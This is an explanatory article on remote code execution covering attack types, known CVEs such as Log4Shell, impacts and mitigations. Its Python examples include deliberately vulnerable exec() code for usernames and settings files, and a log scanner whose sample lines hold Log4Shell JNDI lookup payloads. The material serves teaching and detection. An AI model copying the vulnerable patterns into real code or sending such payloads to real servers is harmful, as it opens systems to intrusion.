REMOTE CODE EXECUTION

Remote code execution is a cyber-attack whereby an attacker can remotely
execute commands on someone else's computing device. Remote code executions
(RCEs) usually occur when malware is downloaded onto the host, and they can
happen regardless of the device's geographic location. Remote Code Execution
(RCE) is also referred to as Remote Code Evaluation.

How an RCE Attack Works


Because remote code execution is such a broad term, there is no single way an
RCE attack can be expected to unfold. In general, RCE attacks have three phases:
1. Hackers identify a vulnerability in a network's hardware or software.
2. By exploiting this vulnerability, they remotely place malicious code or malware
on a device.
3. Once the hackers have access to your network, they compromise user data or
use your network for nefarious purposes.

Types of RCE Attacks


There are several types of RCE attacks. The most common are:
1. Injection attack—various applications allow user-supplied input to execute
commands. Attackers can provide deliberately malformed input data to execute
arbitrary code.
2. Deserialization attack—applications often use serialization to organize data for
easier communication. Deserialization routines can interpret user-supplied
serialized data as executable code.
3. Out-of-bounds write—applications often allocate fixed memory chunks to store
data. Memory allocation flaws allow attackers to supply inputs that write outside
the buffer, into memory that holds executable code, so that attacker-supplied
data ends up being run as code.

Remote Code Execution Exploit Techniques

There are two primary methods for performing RCE: remote code evaluation and
stored code evaluation.

Remote Code Evaluation


Code evaluation occurs when functions that evaluate code accept user input. For
example, some applications build variable names from usernames. Because the
users control their usernames, they can choose a username that includes
malicious code and thereby influence any application that evaluates input as
code in a certain programming language.

Stored Code Evaluation


This method differs from standard remote code evaluation in that it relies on the
interpreter parsing files rather than on specific language functions. The
interpreter should never execute files that contain user input. Web applications
often offer upload functionality but do not sufficiently validate the uploaded
files. For example, an application might give each user a control panel with
language settings, which it stores in a config file. Attackers can modify the
language parameter to inject code into the configuration file, which the
interpreter then runs, allowing them to execute arbitrary commands.
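The two evaluation paths above, as an added example that is not from the page or its sources: a username that is turned into a variable name by exec() (remote code evaluation) and a language setting written into a settings file that the interpreter later executes (stored code evaluation), each shown beside a version that allowlists the input and keeps it as data. The function names, the allowlists and the injected sentinel values are constructed for illustration.

```python
import json, os, re, tempfile
# Remote code evaluation: user input reaches a code-evaluating function.
def register_user_vulnerable(username, namespace):
    # Builds a variable name from the username and exec()s it as Python source.
    exec(f"{username}_logins = 0", namespace)

_NAME_RE = re.compile(r"[A-Za-z][A-Za-z0-9_]{0,31}")

def register_user_safe(username, namespace):
    # Allowlist the name and keep per-user state as data; nothing is evaluated.
    if not _NAME_RE.fullmatch(username):
        raise ValueError("invalid username")
    namespace[f"{username}_logins"] = 0

# Stored code evaluation: the input is written into a settings file that the
# interpreter later executes as code.
def save_language_vulnerable(path, lang):
    with open(path, "w") as f:
        f.write(f'LANGUAGE = "{lang}"\n')  # raw parameter becomes source text

def load_settings_vulnerable(path):
    ns = {}
    with open(path) as f:
        exec(f.read(), ns)  # the file is code, so injected statements run
    return ns

ALLOWED_LANGS = {"en", "de", "fr"}

def save_language_safe(path, lang):
    # Allowlist the value and store it as JSON data rather than as code.
    if lang not in ALLOWED_LANGS:
        raise ValueError("unsupported language")
    with open(path, "w") as f:
        json.dump({"LANGUAGE": lang}, f)

def load_settings_safe(path):
    with open(path) as f:
        return json.load(f)  # parsed as data, never executed
def settings_roundtrip(lang, safe):
    # Save and reload through a temporary file (drives the checks below).
    fd, path = tempfile.mkstemp(suffix=".cfg")
    os.close(fd)
    try:
        save, load = ((save_language_safe, load_settings_safe) if safe
                      else (save_language_vulnerable, load_settings_vulnerable))
        save(path, lang)
        return load(path)
    finally:
        os.unlink(path)
```

In the vulnerable paths a username or language value containing extra statements is executed; in the safe paths the same value is rejected before it is ever stored or evaluated.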

Examples of Known Remote Code Execution Vulnerabilities


Here are some of the most significant RCE vulnerabilities discovered in recent
years:
• CVE-2021-44228 (Log4Shell)—a vulnerability in Apache Log4j 2.x, which was
followed by the additional Log4j vulnerabilities CVE-2021-45046 and
CVE-2021-45105. It affects multiple versions of Log4j, a common logging library
used by millions of Java applications, including some of the world's biggest
online services. It allows attackers to execute code remotely, even if they are
not authenticated, by creating a malicious LDAP server and having the
application reach it via the Log4j JndiLookup class.
• CVE-2021-1844—a vulnerability in operating system modules of Apple iOS,
macOS, watchOS, and Safari. When a victim uses a vulnerable device to
access an attacker-controlled URL, the operating system executes a
malicious payload on that device.
• CVE-2020-17051—a vulnerability affecting a Microsoft Windows
communication protocol, NFS v3. An attacker can use it to connect to a
vulnerable NFS server and send a payload to run on the target endpoint.
• CVE-2019-8942—a vulnerability in WordPress 5.0.0, allowing attackers to
execute arbitrary code in WordPress by uploading a specially crafted image
file that includes PHP code in its Exif metadata.
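The JndiLookup behaviour behind Log4Shell leaves a recognisable trace in request data, which defenders can hunt for in access logs. As an added example (not from the page or its sources), the following scans constructed log lines for JNDI lookup strings; it also unwraps the `${lower:x}`/`${upper:x}` nested lookups that can mask the keyword, which is an added assumption about evasion and not something the page describes.

```python
import re

# Unwrap the simplest nested lookups (e.g. "${lower:j}" -> "j") that would
# otherwise hide the "jndi" keyword from a plain substring search.
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([A-Za-z])\}", re.IGNORECASE)

# A JNDI lookup pointing at a remote LDAP/RMI/DNS server is the trigger
# for the JndiLookup behaviour described above.
_JNDI = re.compile(r"\$\{jndi:(?:ldaps?|rmi|dns)://", re.IGNORECASE)

def normalize(text):
    # Repeat until no nested case lookups remain.
    prev = None
    while prev != text:
        prev, text = text, _CASE_LOOKUP.sub(lambda m: m.group(1), text)
    return text

def find_jndi_lookups(lines):
    # Returns the 1-based line numbers that carry a JNDI lookup string.
    return [i for i, line in enumerate(lines, 1) if _JNDI.search(normalize(line))]

# Constructed sample access-log lines (not from a real system);
# 203.0.113.0/24 is a documentation address range.
SAMPLE_LOG = [
    '2021-12-10T12:00:00Z GET /index.html ua="Mozilla/5.0"',
    '2021-12-10T12:00:01Z GET /login ua="${jndi:ldap://203.0.113.5:1389/a}"',
    '2021-12-10T12:00:02Z GET /search?q=${date:yyyy} ua="curl/7.79"',
    '2021-12-10T12:00:03Z GET /api ua="${${lower:j}ndi:rmi://203.0.113.5/b}"',
]

if __name__ == "__main__":
    for n in find_jndi_lookups(SAMPLE_LOG):
        print("suspicious:", SAMPLE_LOG[n - 1])
```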

Impact

RCE vulnerabilities can have severe impacts on a system or application, including:
• Penetration—attackers can use RCE vulnerabilities as their first entry into a
network or environment.
• Privilege escalation—in many cases, servers have internal vulnerabilities that
can only be seen by those with inside access. RCE allows an attacker to discover
and exploit these vulnerabilities, escalating privileges and gaining access to
connected systems.
• Sensitive data exposure—RCE can be used to exfiltrate data from vulnerable
systems by installing data-stealing malware or directly executing commands. This
can range from simple copying of unencrypted data to memory-scraping malware
that looks for credentials in system memory.
• Denial of Service (DoS)—an RCE vulnerability allows attackers to execute code
on a system. This code can be used to exhaust system resources and crash the
system, or to leverage the system's resources to conduct DoS attacks against
third parties.
• Cryptomining—a common next step after exploiting RCE is to run cryptomining
or cryptojacking malware that uses the computing resources of an infected device
to mine cryptocurrencies for the financial benefit of the attacker.
• Ransomware—possibly the most dangerous consequence of RCE is that attackers
can deploy ransomware on the affected application or server and spread it
through the network, denying users access to their files until they pay
a ransom.

MITIGATIONS

There are many ways to perform RCE, so protecting against it requires a multi-
layered cybersecurity approach:
➢ Patch management: The best way to protect a system or network from an RCE
attack is to fix the vulnerabilities that let an attacker gain access. Microsoft,
for example, releases security patches addressing remote code execution
vulnerabilities in its monthly Patch Tuesday fixes.
➢ Sanitize user input: Deserialization attacks and injection attacks take advantage
of contaminated user inputs. Input sanitization involves validating and filtering
data inputs from users, application programming interfaces and web services.
Escaping is a sanitization technique that neutralizes invalid data in requests so
that it is not interpreted as code.
➢ Inspect incoming traffic: Intrusion detection systems, packet sniffers and
web application firewalls are some of the tools used to vet incoming traffic for
suspicious behavior and keep attackers out.
➢ Buffer overflow protection: When buffer overflow protection software detects
a buffer overflow, it terminates the affected program so that the attacker cannot
exploit the corrupted state.
➢ Runtime application self-protection: This technology analyzes an application's
behavior and the context of that behavior for abnormalities. It can be used to help
sanitize and vet user inputs.
➢ Control access: Network security policies like zero trust, network segmentation
and access management can minimize the impact of a network breach and keep
attackers from escalating privileges.
